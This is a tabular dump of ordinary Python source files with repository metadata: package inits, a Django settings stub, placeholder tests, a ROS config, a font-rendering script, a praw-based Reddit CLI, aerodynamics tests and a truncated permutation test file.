| 0.333333
| true
| 0
| 0.333333
| 0.333333
| 1
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 1
| 1
| 1
| 0
|
0
| 6
|
c33f00ed8ebffd04a69b84d715322c1c7e7d9b68
| 37
|
py
|
Python
|
modules/geopy/parsers/__init__.py
|
flavour/lacity
|
fd1f1cccdcea64d07143b29d4f88996e3af35c4b
|
[
"MIT"
] | 3
|
2015-05-18T05:44:34.000Z
|
2018-05-11T12:15:44.000Z
|
geopy/parsers/__init__.py
|
datadesk/latimes-mappingla-geopy
|
1afcfd98292b929363007e7cd38beae55cdec12d
|
[
"MIT"
] | null | null | null |
geopy/parsers/__init__.py
|
datadesk/latimes-mappingla-geopy
|
1afcfd98292b929363007e7cd38beae55cdec12d
|
[
"MIT"
] | 1
|
2020-04-29T13:58:31.000Z
|
2020-04-29T13:58:31.000Z
|
from geopy.parsers.base import Parser
| 37
| 37
| 0.864865
| 6
| 37
| 5.333333
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.081081
| 37
| 1
| 37
| 37
| 0.941176
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
c352020e5b04cb87f25c913e31b0709fc453c8fc
| 336
|
py
|
Python
|
app/app/settings/prod.py
|
AbhiAgarwal/django-template
|
0f328c4fb43949751ad8a331b376164a86433d1c
|
[
"MIT"
] | null | null | null |
app/app/settings/prod.py
|
AbhiAgarwal/django-template
|
0f328c4fb43949751ad8a331b376164a86433d1c
|
[
"MIT"
] | null | null | null |
app/app/settings/prod.py
|
AbhiAgarwal/django-template
|
0f328c4fb43949751ad8a331b376164a86433d1c
|
[
"MIT"
] | null | null | null |
"""
Django settings for glean project.
Generated by 'django-admin startproject' using Django 1.8.2.
For more information on this file, see
https://docs.djangoproject.com/en/1.8/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.8/ref/settings/
"""
from app.settings.common import *
| 33.6
| 60
| 0.770833
| 55
| 336
| 4.709091
| 0.672727
| 0.023166
| 0.092664
| 0.19305
| 0.247104
| 0.247104
| 0.247104
| 0.247104
| 0
| 0
| 0
| 0.023411
| 0.110119
| 336
| 9
| 61
| 37.333333
| 0.842809
| 0.872024
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 6
|
6f374df30a0c096e4a7c8f72e22cf06648392875
| 271
|
py
|
Python
|
faketests/animals/test_successful_tests.py
|
Djailla/pytest-sugar
|
6ac4a1fa18a51e67c7a759bc11a9264cb78619e4
|
[
"BSD-3-Clause"
] | 418
|
2019-08-30T00:41:51.000Z
|
2022-03-21T09:31:54.000Z
|
faketests/animals/test_successful_tests.py
|
Djailla/pytest-sugar
|
6ac4a1fa18a51e67c7a759bc11a9264cb78619e4
|
[
"BSD-3-Clause"
] | 62
|
2019-08-27T16:50:36.000Z
|
2022-03-11T07:03:32.000Z
|
faketests/animals/test_successful_tests.py
|
Djailla/pytest-sugar
|
6ac4a1fa18a51e67c7a759bc11a9264cb78619e4
|
[
"BSD-3-Clause"
] | 25
|
2019-11-27T15:58:16.000Z
|
2022-03-21T09:31:56.000Z
|
def test_cat1():
assert True
def test_cat2():
assert True
def test_cat3():
assert True
def test_cat4():
assert True
def test_cat5():
assert True
def test_cat6():
assert True
def test_cat7():
assert True
def test_cat8():
assert True
| 11.291667
| 16
| 0.649446
| 40
| 271
| 4.2
| 0.3
| 0.333333
| 0.541667
| 0.708333
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.04
| 0.261993
| 271
| 23
| 17
| 11.782609
| 0.8
| 0
| 0
| 0.5
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.5
| 1
| 0.5
| true
| 0
| 0
| 0
| 0.5
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
6f79ffaa1085428bf5196f6faa49b6f5bb62f9b1
| 812
|
py
|
Python
|
RasPi_Dev/ros_ws/build/third_packages/ar_track_alvar/ar_track_alvar/catkin_generated/pkg.develspace.context.pc.py
|
QianheYu/xtark_driver_dev
|
1708888161cf20c0d1f45c99d0da4467d69c26c8
|
[
"BSD-3-Clause"
] | 1
|
2022-03-11T03:31:15.000Z
|
2022-03-11T03:31:15.000Z
|
RasPi_Dev/ros_ws/build/third_packages/ar_track_alvar/ar_track_alvar/catkin_generated/pkg.develspace.context.pc.py
|
bravetree/xtark_driver_dev
|
1708888161cf20c0d1f45c99d0da4467d69c26c8
|
[
"BSD-3-Clause"
] | null | null | null |
RasPi_Dev/ros_ws/build/third_packages/ar_track_alvar/ar_track_alvar/catkin_generated/pkg.develspace.context.pc.py
|
bravetree/xtark_driver_dev
|
1708888161cf20c0d1f45c99d0da4467d69c26c8
|
[
"BSD-3-Clause"
] | null | null | null |
# generated from catkin/cmake/template/pkg.context.pc.in
CATKIN_PACKAGE_PREFIX = ""
PROJECT_PKG_CONFIG_INCLUDE_DIRS = "/home/xtark/ros_ws/devel/include;/home/xtark/ros_ws/src/third_packages/ar_track_alvar/ar_track_alvar/include".split(';') if "/home/xtark/ros_ws/devel/include;/home/xtark/ros_ws/src/third_packages/ar_track_alvar/ar_track_alvar/include" != "" else []
PROJECT_CATKIN_DEPENDS = "ar_track_alvar_msgs;std_msgs;roscpp;tf;tf2;message_runtime;image_transport;sensor_msgs;geometry_msgs;visualization_msgs;resource_retriever;cv_bridge;pcl_ros;pcl_conversions;dynamic_reconfigure".replace(';', ' ')
PKG_CONFIG_LIBRARIES_WITH_PREFIX = "-lar_track_alvar".split(';') if "-lar_track_alvar" != "" else []
PROJECT_NAME = "ar_track_alvar"
PROJECT_SPACE_DIR = "/home/xtark/ros_ws/devel"
PROJECT_VERSION = "0.7.1"
| 90.222222
| 283
| 0.810345
| 125
| 812
| 4.856
| 0.488
| 0.131796
| 0.118616
| 0.115321
| 0.317957
| 0.286656
| 0.286656
| 0.286656
| 0.286656
| 0.286656
| 0
| 0.005175
| 0.04803
| 812
| 8
| 284
| 101.5
| 0.780078
| 0.066502
| 0
| 0
| 1
| 0.428571
| 0.64418
| 0.571429
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
488ca710dbf71dd34c6f345c3455c22c3efcb671
| 571
|
py
|
Python
|
create_img.py
|
oghahroodi/Hopfield-Network
|
da2d5f28358e5615ce3244a4c6dd1e14be5d8749
|
[
"MIT"
] | null | null | null |
create_img.py
|
oghahroodi/Hopfield-Network
|
da2d5f28358e5615ce3244a4c6dd1e14be5d8749
|
[
"MIT"
] | null | null | null |
create_img.py
|
oghahroodi/Hopfield-Network
|
da2d5f28358e5615ce3244a4c6dd1e14be5d8749
|
[
"MIT"
] | null | null | null |
from PIL import Image, ImageFont
font_siza = 16
font = ImageFont.truetype("Tahoma.ttf", font_siza)
for char in "ABCDEFGHIJ":
im = Image.Image()._new(font.getmask(char))
im.save("train/16/"+char+".bmp")
font_siza = 32
font = ImageFont.truetype("Tahoma.ttf", font_siza)
for char in "ABCDEFGHIJ":
im = Image.Image()._new(font.getmask(char))
im.save("train/32/"+char+".bmp")
font_siza = 64
font = ImageFont.truetype("Tahoma.ttf", font_siza)
for char in "ABCDEFGHIJ":
im = Image.Image()._new(font.getmask(char))
im.save("train/64/"+char+".bmp")
| 23.791667
| 50
| 0.677758
| 86
| 571
| 4.395349
| 0.267442
| 0.126984
| 0.166667
| 0.214286
| 0.777778
| 0.777778
| 0.777778
| 0.777778
| 0.777778
| 0.777778
| 0
| 0.02449
| 0.141856
| 571
| 23
| 51
| 24.826087
| 0.746939
| 0
| 0
| 0.5625
| 0
| 0
| 0.17338
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.0625
| 0
| 0.0625
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
489660e980cda67beaaf63886bab7c83e22c9fc1
| 17,628
|
py
|
Python
|
reddit/rdt.py
|
yathartha1/RedditCLI
|
21ef0005b4dfcbbba6678b4d405fa37242ac43ea
|
[
"MIT"
] | null | null | null |
reddit/rdt.py
|
yathartha1/RedditCLI
|
21ef0005b4dfcbbba6678b4d405fa37242ac43ea
|
[
"MIT"
] | null | null | null |
reddit/rdt.py
|
yathartha1/RedditCLI
|
21ef0005b4dfcbbba6678b4d405fa37242ac43ea
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python3
import webbrowser
from .config import config
import praw
import pickle
from textwrap import fill
cfg = config()
client_id = cfg.get_clientid()
user_agent = cfg.get_useragent()
reddit = praw.Reddit(client_id = client_id,
client_secret = None,
user_agent = user_agent)
class rdt:
def ls(move, subreddits, sort):
def handleListCallType(type):
with open('reddit/variables.json', 'rb') as jsonf:
dictvals = pickle.load(jsonf)
jsonf.close()
dictvals['nextpreviousnormal'] = "False"
dictvals['nextprevioussubreddits'] = "False"
del dictvals['links'][:]
del dictvals['listofsubmissions'][:]
del dictvals['listofsubreddits'][:]
temp = 0
if type == 'hot':
submissions = reddit.front.hot(limit = 100)
elif type == 'new':
submissions = reddit.front.new(limit = 100)
elif type == 'controversial':
submissions = reddit.front.controversial(limit = 100)
elif type == 'top':
submissions = reddit.front.top(limit = 100)
elif type == 'rising':
submissions = reddit.front.rising(limit = 100)
for listvals in submissions:
dictvals['listofsubmissions'].append(listvals)
for i in range(0,len(dictvals['listofsubmissions'])):
if temp<10:
temp = temp + 1
wrapped = fill(dictvals['listofsubmissions'][i].title, width=71, subsequent_indent=' '*7)
print("\33[92m {0:<4} \33[0m {1}".format(str(i + 1), wrapped))
wrapped = fill(dictvals['listofsubmissions'][i].url, width=71, subsequent_indent=' '*7)
print("{0:<5} \33[90m {1} \33[0m".format('', wrapped))
print("{0:<5} \33[90m {1} Upvotes with {2} Comments \33[0m".format('', str(dictvals['listofsubmissions'][i].ups), str(dictvals['listofsubmissions'][i].num_comments)))
dictvals['links'].append(dictvals['listofsubmissions'][i].url)
dictvals['listed'] = "True"
dictvals['countlist'] = temp
if len(dictvals['listofsubmissions']) >= 10:
print("\33[90m (\33[0m\33[93m {} \33[0m\33[90m) \33[0m".format('next'))
dictvals['nextpreviousnormal'] = "True"
with open('reddit/variables.json', 'wb') as f:
pickle.dump(dictvals, f)
f.close()
def handleMoreList(move):
with open('reddit/variables.json', 'rb') as jsonf:
dictvals = pickle.load(jsonf)
jsonf.close()
if move == 'next':
temp = 0
if dictvals['listed'] == "True" and dictvals['countlist']<len(dictvals['listofsubmissions']):
for i in range(dictvals['countlist'],len(dictvals['listofsubmissions'])):
if temp < 10:
temp = temp + 1
wrapped = fill(dictvals['listofsubmissions'][i].title, width=71, subsequent_indent=' '*7)
print("\33[92m {0:<4} \33[0m {1}".format(str(i + 1), wrapped))
wrapped = fill(dictvals['listofsubmissions'][i].url, width=71, subsequent_indent=' '*7)
print("{0:<5} \33[90m {1} \33[0m".format('', wrapped))
print("{0:<5} \33[90m {1} Upvotes with {2} Comments \33[0m".format('', str(dictvals['listofsubmissions'][i].ups), str(dictvals['listofsubmissions'][i].num_comments)))
dictvals['links'].append(dictvals['listofsubmissions'][i].url)
dictvals['countlist'] = dictvals['countlist'] + temp
dictvals['tempvar'] = temp
if dictvals['countlist'] != len(dictvals['listofsubmissions']):
print("\33[90m (\33[0m\33[93m {} \33[0m\33[90m) \33[0m".format('next | previous'))
else:
print("\33[90m (\33[0m\33[93m {} \33[0m\33[90m) \33[0m".format('previous'))
else:
print("{0:<5} \33[31m {1} \33[5m".format('', 'No More Entries Available'))
elif move == 'previous':
if dictvals['listed'] == "True" and dictvals['countlist']>10:
dictvals['countlist'] = dictvals['countlist'] - dictvals['tempvar']
for i in range(dictvals['countlist']-10,dictvals['countlist']):
wrapped = fill(dictvals['listofsubmissions'][i].title, width=71, subsequent_indent=' '*7)
print("\33[92m {0:<4} \33[0m {1}".format(str(i + 1), wrapped))
wrapped = fill(dictvals['listofsubmissions'][i].url, width=71, subsequent_indent=' '*7)
print("{0:<5} \33[90m {1} \33[0m".format('', dictvals['listofsubmissions'][i].url))
print("{0:<5} \33[90m {1} Upvotes with {2} Comments \33[0m".format('', str(dictvals['listofsubmissions'][i].ups), str(dictvals['listofsubmissions'][i].num_comments)))
dictvals['links'].append(dictvals['listofsubmissions'][i].url)
dictvals['tempvar'] = 10
if dictvals['countlist'] > 10:
print("\33[90m (\33[0m\33[93m {} \33[0m\33[90m) \33[0m".format('next | previous'))
else:
print("\33[90m (\33[0m\33[93m {} \33[0m\33[90m) \33[0m".format('next'))
else:
print("{0:<5} \33[31m {1} \33[5m".format('', 'No More Entries Available'))
with open('reddit/variables.json', 'wb') as f:
pickle.dump(dictvals,f)
f.close()
def handleMoreSubreddits(move):
with open('reddit/variables.json', 'rb') as jsonf:
dictvals = pickle.load(jsonf)
jsonf.close()
if move == 'next':
temp = 0
if dictvals['listed'] == "True" and dictvals['countlist']<len(dictvals['listofsubreddits']):
for i in range(dictvals['countlist'],len(dictvals['listofsubreddits'])):
if temp < 10:
temp = temp + 1
wrapped = fill(dictvals['listofsubreddits'][i].display_name_prefixed+ " - "+dictvals['listofsubreddits'][i].title, width=71, subsequent_indent=' '*7)
print("\33[92m {0:<4} \33[0m {1}".format(str(i + 1), wrapped))
wrapped = fill(dictvals['listofsubreddits'][i].urll, width=71, subsequent_indent=' '*7)
print("{0:<5} \33[90m {1} \33[0m".format('', wrapped))
print("{0:<5} \33[90m {1} subscribers\33[0m".format('', str(dictvals['listofsubreddits'][i].subscribers)))
dictvals['countlist'] = dictvals['countlist'] + temp
dictvals['tempvar'] = temp
if dictvals['countlist'] != len(dictvals['listofsubreddits']):
print("\33[90m (\33[0m\33[93m {} \33[0m\33[90m) \33[0m".format('next | previous'))
else:
print("\33[90m (\33[0m\33[93m {} \33[0m\33[90m) \33[0m".format('previous'))
else:
print("{0:<5} \33[31m {1} \33[5m".format('', 'No More Entries Available'))
elif move == 'previous':
if dictvals['listed'] == "True" and dictvals['countlist']>10:
dictvals['countlist'] = dictvals['countlist'] - dictvals['tempvar']
for i in range(dictvals['countlist']-10,dictvals['countlist']):
wrapped = fill(dictvals['listofsubreddits'][i].display_name_prefixed+ " - "+dictvals['listofsubreddits'][i].title, width=71, subsequent_indent=' '*7)
print("\33[92m {0:<4} \33[0m {1}".format(str(i + 1), wrapped))
wrapped = fill(dictvals['listofsubreddits'][i].url, width=71, subsequent_indent=' '*7)
print("{0:<5} \33[90m {1} \33[0m".format('', dictvals['listofsubreddits'][i].url))
print("{0:<5} \33[90m {1} subscribers\33[0m".format('', str(dictvals['listofsubreddits'][i].subscribers)))
dictvals['tempvar'] = 10
if dictvals['countlist'] > 10:
print("\33[90m (\33[0m\33[93m {} \33[0m\33[90m) \33[0m".format('next | previous'))
else:
print("\33[90m (\33[0m\33[93m {} \33[0m\33[90m) \33[0m".format('next'))
else:
print("{0:<5} \33[31m {1} \33[5m".format('', 'No More Entries Available'))
with open('reddit/variables.json', 'wb') as f:
pickle.dump(dictvals,f)
f.close()
with open('reddit/variables.json', 'rb') as jsonf:
dictvals = pickle.load(jsonf)
jsonf.close()
if move == sort == None and subreddits == False:
handleListCallType('hot')
elif move == None and subreddits == False and sort != None:
handleListCallType(sort)
elif (move == 'next' or move == 'previous') and subreddits == False and sort == None:
if dictvals['nextpreviousnormal'] == "True":
handleMoreList(move)
else:
print("{0:<5} \33[31m {1} \33[5m".format('', 'Nothing to Display'))
elif move == None and subreddits == True and sort == None:
dictvals['nextpreviousnormal'] = False
dictvals['nextprevioussubreddits'] = False
temp = 0
del dictvals['links'][:]
del dictvals['listofsubmissions'][:]
del dictvals['listofsubreddits'][:]
subreddits = reddit.subreddits.popular(limit = 100)
for listvals in subreddits:
dictvals['listofsubreddits'].append(listvals)
for i in range(0,len(dictvals['listofsubreddits'])):
if temp<10:
temp = temp + 1
wrapped = fill(dictvals['listofsubreddits'][i].display_name_prefixed+ " - "+dictvals['listofsubreddits'][i].title, width=71, subsequent_indent=' '*7)
print("\33[92m {0:<4} \33[0m {1}".format(str(i + 1), wrapped))
wrapped = fill(dictvals['listofsubreddits'][i].url, width=71, subsequent_indent=' '*7)
print("{0:<5} \33[90m {1} \33[0m".format('', dictvals['listofsubreddits'][i].url))
print("{0:<5} \33[90m {1} subscribers\33[0m".format('', str(dictvals['listofsubreddits'][i].subscribers)))
dictvals['listed'] = "True"
dictvals['countlist'] = temp
if len(dictvals['listofsubreddits']) >= 10:
print("\33[90m (\33[0m\33[93m {} \33[0m\33[90m) \33[0m".format('next'))
dictvals['nextprevioussubreddits'] = "True"
with open('reddit/variables.json', 'wb') as f:
pickle.dump(dictvals,f)
f.close()
elif (move == 'next' or move == 'previous') and subreddits == True and sort == None:
if dictvals['nextprevioussubreddits'] == "True":
handleMoreSubreddits(move)
else:
print("{0:<5} \33[31m {1} \33[5m".format('', 'Nothing to Display'))
def view(index, comments, more_comments):
with open('reddit/variables.json', 'rb') as jsonf:
dictvals = pickle.load(jsonf)
jsonf.close()
def handleMoreComments():
temp = 0
if dictvals['countcomments'] < len(dictvals['listofcomments']):
for i in range(dictvals['countcomments'],len(dictvals['listofcomments'])):
if (temp<10):
temp = temp + 1
wrapped = fill(dictvals['listofcomments'][i].body, width=71, subsequent_indent=' '*7)
print("\33[92m {0:<4} \33[0m {1}".format(str(i + 1), wrapped))
wrapped = fill(str(dictvals['listofcomments'][i].author), width=71, subsequent_indent=' '*7)
print("{0:<5} \33[90m Posted By {1}\33[0m".format('', wrapped))
print("{0:<5} \33[90m {1} Upvotes\33[0m".format('', str(dictvals['listofcomments'][i].ups)))
dictvals['countcomments'] = dictvals['countcomments'] + temp
else:
print("{0:<5} \33[31m {1} \33[5m".format('', 'No More Entries Available'))
if dictvals['listed'] == "True" and len(dictvals['links']) != 0:
if index != None and comments == more_comments == False:
if int(index)<len(dictvals['links']) and int(index)>=0:
webbrowser.open(dictvals['links'][int(index)])
else:
print("{0:<5} \33[31m {1} \33[5m".format('', 'No Such Index'))
elif index != None and comments == True and more_comments == False:
if int(index)<len(dictvals['listofsubmissions']) and int(index)>=0:
del dictvals['listofcomments'][:]
comments = dictvals['listofsubmissions'][int(index)].comments
for comment in comments:
dictvals['listofcomments'].append(comment)
if len(dictvals['listofcomments'])>=10:
for i in range(0,10):
wrapped = fill(dictvals['listofcomments'][i].body, width=71, subsequent_indent=' '*7)
print("\33[92m {0:<4} \33[0m {1}".format(str(i + 1), wrapped))
wrapped = fill(str(dictvals['listofcomments'][i].author), width=71, subsequent_indent=' '*7)
print("{0:<5} \33[90m Posted By {1}\33[0m".format('', wrapped))
print("{0:<5} \33[90m {1} Upvotes\33[0m".format('', str(dictvals['listofcomments'][i].ups)))
dictvals['countcomments'] = 10
else:
for i in range(0,len(dictvals['listofcomments'])):
wrapped = fill(dictvals['listofcomments'][i].body, width=71, subsequent_indent=' '*7)
print("\33[92m {0:<4} \33[0m {1}".format(str(i + 1), wrapped))
wrapped = fill(str(dictvals['listofcomments'][i].author), width=71, subsequent_indent=' '*7)
print("{0:<5} \33[90m Posted By {1}\33[0m".format('', wrapped))
print("{0:<5} \33[90m {1} Upvotes\33[0m".format('', str(dictvals['listofcomments'][i].ups)))
else:
print("{0:<5} \33[31m {1} \33[5m".format('', 'No Such Index'))
elif index != None and comments == False and more_comments == True:
if len(dictvals['listofcomments']) != 0 and dictvals['countcomments'] == 10:
handleMoreComments()
else:
print("{0:<5} \33[31m {1} \33[5m".format('', 'Nothing to View'))
with open('reddit/variables.json', 'wb') as f:
pickle.dump(dictvals,f)
f.close()
else:
print("{0:<5} \33[31m {1} \33[5m".format('', 'Nothing to View'))
def search(input):
with open('reddit/variables.json', 'rb') as jsonf:
dictvals = pickle.load(jsonf)
jsonf.close()
if input != None:
dictvals['nextpreviousnormal'] = "False"
dictvals['nextprevioussubreddits'] = "False"
temp = 0
del dictvals['links'][:]
del dictvals['listofsubmissions'][:]
del dictvals['listofsubreddits'][:]
try:
searchs = reddit.subreddit('all').search(str(input),limit = 100)
for listvals in searchs:
dictvals['listofsubmissions'].append(listvals)
except:
print("{0:<5} \33[31m {1} \33[5m".format('', 'Invalid Entry'))
else:
for i in range(0,len(dictvals['listofsubmissions'])):
if temp<10:
temp = temp + 1
wrapped = fill(dictvals['listofsubmissions'][i].title, width=71, subsequent_indent=' '*7)
print("\33[92m {0:<4} \33[0m {1}".format(str(i + 1), wrapped))
wrapped = fill(dictvals['listofsubmissions'][i].url, width=71, subsequent_indent=' '*7)
print("{0:<5} \33[90m {1} \33[0m".format('', wrapped))
print("{0:<5} \33[90m {1} Upvotes with {2} Comments \33[0m".format('', str(dictvals['listofsubmissions'][i].ups), str(dictvals['listofsubmissions'][i].num_comments)))
dictvals['links'].append(dictvals['listofsubmissions'][i].url)
dictvals['listed'] = "True"
dictvals['countlist'] = temp
if len(dictvals['listofsubmissions']) >= 10:
print("\33[90m (\33[0m\33[93m {} \33[0m\33[90m) \33[0m".format('next'))
dictvals['nextpreviousnormal'] = "True"
with open('reddit/variables.json', 'wb') as f:
pickle.dump(dictvals,f)
f.close()
else:
print("{0:<5} \33[31m {1} \33[5m".format('', 'Enter Something To Search'))
| 58.370861
| 194
| 0.509644
| 1,870
| 17,628
| 4.781283
| 0.07754
| 0.028185
| 0.025836
| 0.033218
| 0.832905
| 0.798121
| 0.781344
| 0.781344
| 0.753943
| 0.732133
| 0
| 0.068966
| 0.325505
| 17,628
| 301
| 195
| 58.564784
| 0.683011
| 0.001191
| 0
| 0.690909
| 0
| 0.054545
| 0.251903
| 0.020561
| 0
| 0
| 0
| 0
| 0
| 1
| 0.025455
| false
| 0
| 0.018182
| 0
| 0.047273
| 0.196364
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
48977ea5dec7bd2f371edfa2689770459494abf2
| 43
|
py
|
Python
|
socketlabs/__init__.py
|
MattHealy/socketlabs-python
|
890647cc0cd952ed1a52bdd96f7e9dd8c28810c9
|
[
"MIT"
] | null | null | null |
socketlabs/__init__.py
|
MattHealy/socketlabs-python
|
890647cc0cd952ed1a52bdd96f7e9dd8c28810c9
|
[
"MIT"
] | 4
|
2015-12-13T10:39:31.000Z
|
2018-11-30T00:58:08.000Z
|
socketlabs/__init__.py
|
MattHealy/socketlabs-python
|
890647cc0cd952ed1a52bdd96f7e9dd8c28810c9
|
[
"MIT"
] | null | null | null |
from . socketlabs import SocketLabs # noqa
| 21.5
| 42
| 0.790698
| 5
| 43
| 6.8
| 0.8
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.162791
| 43
| 1
| 43
| 43
| 0.944444
| 0.093023
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
489e4a2d386d8c1a809a3799fd4b2d3bb012eff1
| 2,204
|
py
|
Python
|
openaerostruct/aerodynamics/tests/test_viscous_drag.py
|
EricUrbineer/OpenAeroStruct
|
26c37a0e86074517680405687824e27b3b2caaec
|
[
"Apache-2.0"
] | 4
|
2020-09-15T23:24:15.000Z
|
2021-01-11T19:59:39.000Z
|
openaerostruct/aerodynamics/tests/test_viscous_drag.py
|
EricUrbineer/OpenAeroStruct
|
26c37a0e86074517680405687824e27b3b2caaec
|
[
"Apache-2.0"
] | null | null | null |
openaerostruct/aerodynamics/tests/test_viscous_drag.py
|
EricUrbineer/OpenAeroStruct
|
26c37a0e86074517680405687824e27b3b2caaec
|
[
"Apache-2.0"
] | 2
|
2020-08-25T16:38:14.000Z
|
2020-12-03T09:49:45.000Z
|
import unittest
from openaerostruct.aerodynamics.viscous_drag import ViscousDrag
from openaerostruct.utils.testing import run_test, get_default_surfaces
from openmdao.api import Group, IndepVarComp, BsplinesComp
import numpy as np
class Test(unittest.TestCase):
    """Verification tests for the ViscousDrag aero component.

    Both tests build the identical Group wiring — an IndepVarComp feeding a
    BsplinesComp that interpolates the t_over_c control points, feeding
    ViscousDrag — and differ only in how the default surface dict is tweaked,
    so the shared setup lives in _build_group.
    """

    def _build_group(self, surface):
        """Assemble indep vars -> t/c b-spline interpolation -> ViscousDrag."""
        ny = surface['mesh'].shape[1]       # spanwise mesh dimension
        n_cp = len(surface['t_over_c_cp'])  # number of t/c control points

        group = Group()

        indep_var_comp = IndepVarComp()
        indep_var_comp.add_output('t_over_c_cp', val=surface['t_over_c_cp'])
        group.add_subsystem('indep_var_comp', indep_var_comp, promotes=['*'])

        # Interpolate the control points onto the ny-1 panel stations.
        group.add_subsystem('t_over_c_bsp', BsplinesComp(
            in_name='t_over_c_cp', out_name='t_over_c',
            num_control_points=n_cp, num_points=int(ny - 1),
            bspline_order=min(n_cp, 4), distribution='uniform'),
            promotes_inputs=['t_over_c_cp'], promotes_outputs=['t_over_c'])

        comp = ViscousDrag(surface=surface, with_viscous=True)
        group.add_subsystem('viscousdrag', comp, promotes=['*'])
        return group

    def test(self):
        # Non-default t/c control-point distribution.
        surface = get_default_surfaces()[0]
        surface['t_over_c_cp'] = np.array([0.1, 0.15, 0.2])
        run_test(self, self._build_group(surface), complex_flag=True)

    def test_2(self):
        # k_lam tweaked away from its default (presumably the laminar-flow
        # fraction — confirm against the surface definition).
        surface = get_default_surfaces()[0]
        surface['k_lam'] = .5
        run_test(self, self._build_group(surface), complex_flag=True)
| 35.548387
| 77
| 0.65608
| 307
| 2,204
| 4.32899
| 0.247557
| 0.063958
| 0.076749
| 0.066215
| 0.790068
| 0.784048
| 0.784048
| 0.728367
| 0.728367
| 0.728367
| 0
| 0.010901
| 0.209165
| 2,204
| 61
| 78
| 36.131148
| 0.751578
| 0
| 0
| 0.727273
| 0
| 0
| 0.124319
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.045455
| false
| 0
| 0.113636
| 0
| 0.181818
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
48a609fb12f8d8c4bbc48328fd289fffc7608961
| 5,776
|
py
|
Python
|
tests/permutation/test_permutation.py
|
alexgorji/musurgia
|
81d37afbf1ac70348002a93299db228b5ed4a591
|
[
"MIT"
] | null | null | null |
tests/permutation/test_permutation.py
|
alexgorji/musurgia
|
81d37afbf1ac70348002a93299db228b5ed4a591
|
[
"MIT"
] | 45
|
2020-02-24T19:37:00.000Z
|
2021-04-06T16:13:56.000Z
|
tests/permutation/test_permutation.py
|
alexgorji/musurgia
|
81d37afbf1ac70348002a93299db228b5ed4a591
|
[
"MIT"
] | null | null | null |
from unittest import TestCase
from musurgia.permutation import LimitedPermutation, self_permute, get_self_multiplied_permutation, \
get_reordered_self_multiplied_permutation, get_vertical_self_multiplied_permutation
class Test(TestCase):
    """Unit tests for the musurgia permutation helpers.

    Each test pins the exact output of one helper (self_permute,
    get_self_multiplied_permutation, get_reordered_self_multiplied_permutation,
    get_vertical_self_multiplied_permutation) or of LimitedPermutation against
    a hand-written expected value.
    """

    def test_1_1(self):
        # self_permute([3, 1, 2]) must yield exactly these three orders.
